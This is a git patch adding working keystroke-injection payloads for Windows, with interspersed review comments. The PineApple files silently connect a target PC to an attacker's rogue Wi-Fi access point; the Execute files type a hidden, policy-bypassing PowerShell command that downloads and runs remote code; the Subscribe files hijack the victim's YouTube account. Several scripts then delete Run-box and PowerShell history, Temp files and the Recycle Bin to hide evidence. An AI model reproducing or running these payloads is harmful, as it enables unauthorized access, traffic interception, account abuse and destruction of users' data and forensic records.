From 259bc62d779a92e110984008775682225b42278b Mon Sep 17 00:00:00 2001
From: I-Am-Jakoby
Date: Mon, 9 May 2022 22:42:25 -0500
Subject: [PATCH] Add files via upload
---
.../-OMG-PineApple/PineApple-Execute.txt | 17 +++
.../-OMG-PineApple/PineApple-KeyInjection.txt | 80 ++++++++++++++
.../general/-OMG-PineApple/PineApple.ps1 | 52 +++++++++
.../library/general/-OMG-PineApple/README.md | 102 ++++++++++++++++++
.../library/general/-OMG-Subscribe/README.md | 102 ++++++++++++++++++
.../-OMG-Subscribe/Subscribe-Execute.txt | 16 +++
.../general/-OMG-Subscribe/Subscribe.ps1 | 38 +++++++
.../general/-OMG-Subscribe/Subscribe.txt | 32 ++++++
8 files changed, 439 insertions(+)
create mode 100644 payloads/library/general/-OMG-PineApple/PineApple-Execute.txt
create mode 100644 payloads/library/general/-OMG-PineApple/PineApple-KeyInjection.txt
create mode 100644 payloads/library/general/-OMG-PineApple/PineApple.ps1
create mode 100644 payloads/library/general/-OMG-PineApple/README.md
create mode 100644 payloads/library/general/-OMG-Subscribe/README.md
create mode 100644 payloads/library/general/-OMG-Subscribe/Subscribe-Execute.txt
create mode 100644 payloads/library/general/-OMG-Subscribe/Subscribe.ps1
create mode 100644 payloads/library/general/-OMG-Subscribe/Subscribe.txt
diff --git a/payloads/library/general/-OMG-PineApple/PineApple-Execute.txt b/payloads/library/general/-OMG-PineApple/PineApple-Execute.txt
new file mode 100644
index 0000000..c95d143
--- /dev/null
+++ b/payloads/library/general/-OMG-PineApple/PineApple-Execute.txt
@@ -0,0 +1,17 @@
+REM Title: OMG-PineApple
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
+REM This version of the payload is executed using an invoke web-request to download and execute the file to add the PineApple's network profile
+REM The powershell script needed is provided as OMG-PineApple.ps1
+
+REM Target: Windows 10, 11
+
+REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
+ENTER
diff --git a/payloads/library/general/-OMG-PineApple/PineApple-KeyInjection.txt b/payloads/library/general/-OMG-PineApple/PineApple-KeyInjection.txt
new file mode 100644
index 0000000..f87c61a
--- /dev/null
+++ b/payloads/library/general/-OMG-PineApple/PineApple-KeyInjection.txt
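Review bot: The header comment names the script `OMG-PineApple.ps1`, but the file this commit adds is `PineApple.ps1`, so the line should read `REM The powershell script needed is provided as PineApple.ps1`; `Remeber` a few lines further down should be `Remember`. The comments also leave out that the STRING line evaluates whatever the shared link returns through `invoke-expression` under `-Exec Bypass`, so anyone able to edit the hosted file decides what runs on the host; the same line appears in Subscribe-Execute.txt. On the host this appears as a hidden-window `powershell` process started from the Run dialog with a download-and-evaluate command line, which process-creation auditing and script-block logging record when they are enabled.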
@@ -0,0 +1,80 @@
+
+REM Title: PineApple
+REM Description: This payload is meant to use powershell to add the network profile of your wifi pineapple to the targets PC and connect to it
+REM This version is a direct key stroke injection attack
+REM Author: I am Jakoby
+REM Target: Windows 10, 11
+
+DELAY 1000
+
+REM If the wifi pineapple SSID is detected target PC will connect to it
+
+IF_PRESENT SSID="PineApple"
+
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+
+STRING $profilefile="Home.xml";
+SHIFT ENTER
+STRING $SSID="PineApple";
+SHIFT ENTER
+STRING $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''
+SHIFT ENTER
+DELAY 500
+STRING $xmlfile="
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING $SSID
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING $SSIDHEX
+SHIFT ENTER
+STRING $SSID
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING ESS
+SHIFT ENTER
+STRING manual
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING open
+SHIFT ENTER
+STRING none
+SHIFT ENTER
+STRING false
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING
+SHIFT ENTER
+STRING "
+SHIFT ENTER
+STRING $XMLFILE > ($profilefile)
+SHIFT ENTER
+STRING netsh wlan add profile filename="$($profilefile)"
+SHIFT ENTER
+STRING netsh wlan connect name=$SSID
+SHIFT ENTER
+STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+DELAY 500
+ENTER
diff --git a/payloads/library/general/-OMG-PineApple/PineApple.ps1 b/payloads/library/general/-OMG-PineApple/PineApple.ps1
new file mode 100644
index 0000000..7f4628a
--- /dev/null
+++ b/payloads/library/general/-OMG-PineApple/PineApple.ps1
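Review bot: The last typed line runs `reg delete` on the `RunMRU` key with `/va /f` and then `Remove-Item (Get-PSreadlineOption).HistorySavePath`, which removes every Run-dialog entry and the user's entire PSReadLine history file, not only what this payload typed, and the REM header does not mention it. A line such as `REM Side effects: deletes all RunMRU values and the PSReadLine history file for the current user` belongs in the header; PineApple.ps1 and Subscribe.txt carry the same two commands. The profile typed here appears to use `open`/`none` authentication (the XML tags are not visible in this view) and stays stored on the machine after the run, along with `Home.xml` in the working directory, so both remain as host artifacts for whoever examines the machine later.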
@@ -0,0 +1,52 @@
+$profilefile="Home.xml"
+$SSID="PineApple"
+$SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''
+$xmlfile="
+
+$SSID
+
+
+$SSIDHEX
+$SSID
+
+
+ESS
+manual
+
+
+
+open
+none
+false
+
+
+
+
+"
+$XMLFILE > ($profilefile)
+netsh wlan add profile filename="$($profilefile)"
+netsh wlan connect name=$SSID
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
diff --git a/payloads/library/general/-OMG-PineApple/README.md b/payloads/library/general/-OMG-PineApple/README.md
new file mode 100644
index 0000000..91a63e8
--- /dev/null
+++ b/payloads/library/general/-OMG-PineApple/README.md
@@ -0,0 +1,102 @@
+![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
+
+
+
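Review bot: The cleanup section of PineApple.ps1 deletes far more than this script creates: `rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue` empties the user's whole Temp directory and `Clear-RecycleBin -Force -ErrorAction SilentlyContinue` permanently discards every file the user had in the Recycle Bin, with errors silenced in both cases. Neither location is written to by the lines above, which only produce `Home.xml` in the current directory, so these two commands are unrelated data destruction and should be dropped. The `.NOTES` comment should at least list each location the block deletes from, since the README in this commit mentions only the PowerShell and Run-box history.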
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# OMG-PineApple + +A script used to connect a targets PC to your wifi PineApple + +## Description + +This program will generate an XML file that will be used to create a network profile for your Wifi PineApple. +Depending on your method of execution the XML file will either be manually entered into a powershell window +or you may use and Invoke Web-Request to download a script to add the network profile. After either the history of +the powershell window and run box will be erased for a clean exit. + +## Getting Started + +### Dependencies + +* DropBox or another File Hosting service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Either the entire script will be manually entered into the powershell window or +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +* PS1 file to download is provided above +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-PineApple) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + + + +

(back to top)

diff --git a/payloads/library/general/-OMG-Subscribe/README.md b/payloads/library/general/-OMG-Subscribe/README.md new file mode 100644 index 0000000..d1c5949 --- /dev/null +++ b/payloads/library/general/-OMG-Subscribe/README.md @@ -0,0 +1,102 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Subscribe + +A script I put together to make your target subscribe to your youtube channel + +## Description + +This script is set to run with 2 different methods. +Either you use straight keystroke injection with no dependencies +Or you use an Invoke-WebRequest to download and execute a powershell script that will do the same thing +(With the powershell script you have the ability to modify it and add other actions) +Either way your target will be directed to your youtube page where they will be made to subscribe to you + +## Getting Started + +### Dependencies + +* DropBox or other file hosting service - Your Shared link for the intended file +* Windows 10,11 +* Your target will have to be signed into their youtube account + +

(back to top)

+ +### Executing program + +* Plug in your device +* Either a straight keystroke injection will be used +* OR +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Subscribe) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

diff --git a/payloads/library/general/-OMG-Subscribe/Subscribe-Execute.txt b/payloads/library/general/-OMG-Subscribe/Subscribe-Execute.txt new file mode 100644 index 0000000..da722db --- /dev/null +++ b/payloads/library/general/-OMG-Subscribe/Subscribe-Execute.txt @@ -0,0 +1,16 @@ +REM Title: Subscribe + +REM Author: I am Jakoby + +REM Description: This payload is meant to make your target subscribe to your youtube channel + +REM Target: Windows 10, 11 + +REM Remember to replace the link with your link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly + + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +ENTER diff --git a/payloads/library/general/-OMG-Subscribe/Subscribe.ps1 b/payloads/library/general/-OMG-Subscribe/Subscribe.ps1 new file mode 100644 index 0000000..f5cba26 --- /dev/null +++ b/payloads/library/general/-OMG-Subscribe/Subscribe.ps1 
@@ -0,0 +1,38 @@ +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : Subscribe | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : General | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.DESCRIPTION + This program is designed to get your target to subscribe to your youtube channel +#> +############################################################################################################################################# + +# Enter your youtube channel URL here, but you should test this script with my URL first ;D + +$channel = "https://www.youtube.com/iamjakoby" + +Add-Type -AssemblyName System.Windows.Forms +$o=New-Object -ComObject WScript.Shell +$url = -join($channel,"?sub_confirmation=1") +Start-Process $url +Start-Sleep 
-Seconds 3 +[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2) +[System.Windows.Forms.SendKeys]::SendWait('{ENTER}') +Start-Sleep -Seconds 1 +[System.Windows.Forms.SendKeys]::SendWait('%{F4}') diff --git a/payloads/library/general/-OMG-Subscribe/Subscribe.txt b/payloads/library/general/-OMG-Subscribe/Subscribe.txt new file mode 100644 index 0000000..5142333 --- /dev/null +++ b/payloads/library/general/-OMG-Subscribe/Subscribe.txt @@ -0,0 +1,32 @@ +REM Title: OMG-Subscribe +REM Description: This payload is meant to get the owner of the target PC to subscribe to your youtube channel +REM Author: I am Jakoby +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass Start-Process " + +REM put your youtube link here, you should test it out with mine first though ;D +STRING https://www.youtube.com/iamjakoby + +STRING ?sub_confirmation=1" +DELAY 500 +ENTER +DELAY 3000 +TAB +DELAY 1000 +TAB +DELAY 1000 +ENTER +DELAY 500 +ALT F4 +DELAY 1000 +GUI r +DELAY 500 + +REM This will clear their powershell and runbox history + +STRING powershell -w h -NoP -NonI -Exec Bypass reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath +DELAY 500 +ENTER
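Review bot: `$o=New-Object -ComObject WScript.Shell` in Subscribe.ps1 is assigned and never used in the visible script, so the line can be removed. The `SendKeys` calls after the fixed `Start-Sleep` go to whichever window holds focus at that moment, so `SendWait('%{F4}')` can close an unrelated application and discard the user's unsaved work; a comment above that line should state this side effect. Subscribe.txt has the same blind `ALT F4` step after its fixed delays.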